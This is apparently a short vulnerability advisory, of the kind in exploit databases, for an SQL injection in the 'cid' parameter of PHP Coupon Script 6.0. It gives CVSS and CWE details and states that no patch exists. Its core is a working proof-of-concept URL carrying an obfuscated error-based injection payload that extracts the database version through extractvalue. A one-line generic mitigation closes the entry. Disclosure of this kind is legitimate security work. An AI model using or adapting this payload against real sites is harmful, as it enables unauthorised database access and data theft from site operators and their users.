vendor:
PHP Coupon Script
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Coupon Script
Affected Version From: 6.0
Affected Version To: 6.0
Patch Exists: NO
Related CWE: N/A
CPE: a:couponscript:php_coupon_script:6.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
PHP Coupon Script 6.0 – ‘cid’ Parameter SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?page=cat&cid=[SQL] 34'+/*!00000Procedure*/+/*!00000Analyse*/+(extractvalue(0,/*!00000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
Mitigation:
Input validation and sanitization should be used to prevent SQL injection attacks.